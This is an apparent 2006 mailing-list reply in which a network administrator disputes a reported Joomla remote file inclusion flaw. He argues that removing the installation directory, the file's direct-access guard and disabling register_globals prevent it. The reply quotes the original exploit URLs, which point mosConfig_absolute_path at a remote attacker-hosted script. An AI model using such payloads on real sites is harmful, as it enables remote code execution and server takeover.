root@xxxxxxxxxxxxxxxxx schrieb am 06.11.2006 13:28:37: > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--==-=-==-= > > Bug : include_once ( $mosConfig_absolute_path . '/language/'. > $mosConfig_lang .'.php' ); > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--==-=-==-= > > Exploit : www.target.com/script_path/installation/index.php? > mosConfig_absolute_path=http://www.arab4services.com/c-h.v2.txt? > ------> www.target. > com/script_path/administrator/components/com_admin/admin.admin.html.php? > mosConfig_absolute_path=http://www.arab4services.com/c-h.v2.txt? 1. The installation directory is to be removed after the installation of Joomla!. If you do not follow the instructions - your fault. Having the installation files still on your webserver makes your whole server totally prone of being hijacked, since you can rewrite the configuration. So no need for some remote file inclusion when you can just reset the site with install files... 2. The admin.admin.html.php file is not directly accessible: "// no direct access defined( '_VALID_MOS' ) or die( 'Restricted access' );" So I do not see how this could be exploitable at all. Anyways, this all only works if you have register_globals enabled, which is strongly discouraged by Joomla!, it even gives you big red warnings to turn it off everytime you enter the admin backend. Hacks is what you get when ignoring security warnings. regards Sascha -- Sascha Runschke Netzwerk Management IT-Services ABIT AG Robert-Bosch-Str. 1 40668 Meerbusch Tel.:+49 (0) 2150.9153.226 Mobil:+49 (0) 173.5419665 mailto:SRunschke@xxxxxxx http://www.abit.net http://www.abit-epos.net --------------------------------- Sicherheitshinweis zur E-Mail Kommunikation / Security note regarding email communication: http://www.abit.net/sicherheitshinweis.html
